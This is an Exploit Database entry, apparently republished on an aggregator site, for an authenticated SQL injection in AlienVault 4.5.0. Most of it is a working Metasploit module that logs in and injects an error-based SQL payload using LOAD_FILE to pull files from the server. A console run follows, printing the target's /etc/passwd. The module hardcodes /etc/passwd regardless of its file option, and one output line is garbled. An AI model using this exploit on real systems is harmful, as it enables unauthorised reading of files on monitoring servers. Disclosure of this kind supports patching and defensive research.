Alienvault 4.5.0 – (Authenticated) SQL Injection (Metasploit)

• Exploit Database
• 11 阅读

• 作者： Brandon Perry
  日期： 2014-04-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32644/

• The following request is vulnerable to a SQL injection attack from authenticated users.
   
  GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
  Host: 172.31.16.150
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
  Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
  Connection: keep-alive
   
   
  ------------------------------------------------------------------------------------------------
   
  The following metasploit module will exploit this in order to read a file off of the file system:
   
   
  ##
  ## This module requires Metasploit: http//metasploit.com/download
  ## Current source: https://github.com/rapid7/metasploit-framework
  ###
   
  require 'msf/core'
   
  class Metasploit4 < Msf::Auxiliary
   
  include Msf::Exploit::Remote::HttpClient
   
  def initialize(info={})
  super(update_info(info,
  'Name' => "AlienVault 4.5.0 authenticated SQL injection arbitrary file read",
  'Description' => %q{
  AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
  generation PHP file. This module exploits this to read an arbitrary file from
  the file system. Any authed user should be usable. Admin not required.
  },
  'License' => MSF_LICENSE,
  'Author' =>
  [
  'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
  ],
  'References' =>
  [
  ],
  'Platform' => ['linux'],
  'Privileged' => false,
  'DisclosureDate' => "Mar 30 2014"))
   
  register_options(
  [
  OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
  OptString.new('USERNAME', [ true, 'Single username', 'username']),
  OptString.new('PASSWORD', [ true, 'Single password', 'password']),
  OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/'])
  ], self.class)
   
  end
   
  def run
  res = send_request_cgi({
  'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
  })
   
  cookie = res.get_cookies
   
  post = {
  'embed' => '',
  'bookmark_string' => '',
  'user' => datastore['USERNAME'],
  'passu' => datastore['PASSWORD'],
  'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
  }
   
  res = send_request_cgi({
  'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
  'method' => 'POST',
  'vars_post' => post,
  'cookie' => cookie
  })
   
  if res.headers['Location'] != '/ossim/'
  fail_with('Authentication failed')
  end
   
  cookie = res.get_cookies
   
  done = false
  i = 0
  full = ''
   
  while !done
  pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x7175777471,"
  pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) AS CHAR),"
  pay << "0x20)),#{(50*i)+1},50)),0x7169716d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
  pay << " GROUP BY x)a) AND 'xnDa'='xnDa"
   
  get = {
  'date_from' => pay,
  'date_to' => '2014-03-30'
  }
   
  res = send_request_cgi({
  'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),
  'cookie' => cookie,
  'vars_get' => get
  })
   
  file = /quwtq(.*)qiqmq/.match(res.body)
   
  file = file[1]
   
  if file == ''
  done = true
  end
   
  str = [file].pack("H*")
  full << str
  vprint_status(str)
   
  i = i+1
   
  end
   
  path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
  print_good("File stored at path: " + path)
  end
  end
   
  -----------------------------------------------------------------------------
   
  Quick run of the module:
   
  msf auxiliary(alienvault_isp27001_sqli) > show options
   
  Module options (auxiliary/gather/alienvault_isp27001_sqli):
   
  Name Current Setting Required Description
  ---- --------------- -------- -----------
  FILEPATH /etc/passwd yes Path to remote file
  PASSWORD password yes Single password
  Proxies no Use a proxy chain
  RHOST 172.31.16.150 yes The target address
  RPORT 443 yes The target port
  TARGETURI / yes Relative URI of installation
  USERNAME username yes Single username
  VHOST no HTTP server virtual host
   
  msf auxiliary(alienvault_isp27001_sqli) > run
   
  [+] File stored at path: /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
  [*] Auxiliary module execution completed
  80922_default_172.31.16.150_alienvault.file_049766.txterry/.msf4/loot/201403300
  [*] exec: cat /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
   
  root:x:0:0:root:/root:/usr/bin/llshell
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/bin/sh
  man:x:6:12:man:/var/cache/man:/bin/sh
  lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  mail:x:8:8:mail:/var/mail:/bin/sh
  news:x:9:9:news:/var/spool/news:/bin/sh
  uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  proxy:x:13:13:proxy:/bin:/bin/sh
  www-data:x:33:33:www-data:/var/www:/bin/sh
  backup:x:34:34:backup:/var/backups:/bin/sh
  list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
  munin:x:102:104::/var/lib/munin:/bin/false
  postfix:x:103:106::/var/spool/postfix:/bin/false
  snmp:x:104:108::/var/lib/snmp:/bin/false
  hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
  ossec:x:1000:1000::/var/ossec/:/bin/false
  ossecm:x:1001:1000::/var/ossec/:/bin/false
  ossecr:x:1002:1000::/var/ossec/:/bin/false
  ntop:x:106:111::/var/lib/ntop:/bin/false
  snort:x:107:112:Snort IDS:/var/log/snort:/bin/false
  prads:x:108:113::/home/prads:/bin/false
  nagios:x:109:114::/var/lib/nagios:/bin/false
  mysql:x:110:115:MySQL Server,,,:/var/lib/mysql:/bin/false
  asec:x:111:116:Alienvault smart event system user,,,:/var/lib/asec:/bin/false
  mongodb:x:112:65534::/home/mongodb:/bin/false
  avserver:x:113:121:AlienVault SIEM,,,:/home/avserver:/bin/false
  avidm:x:114:121:AlienVault IDM,,,:/home/avidm:/bin/false
  stunnel4:x:115:122::/var/run/stunnel4:/bin/false
  avagent:x:116:121:AlienVault Agent,,,:/home/avagent:/bin/false
  avapi:x:117:121:AlienVault SIEM,,,:/home/avapi:/bin/bash
  rabbitmq:x:118:123:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
  avforw:x:119:121:AlienVault SIEM,,,:/home/avforw:/bin/false
  msf auxiliary(alienvault_isp27001_sqli) >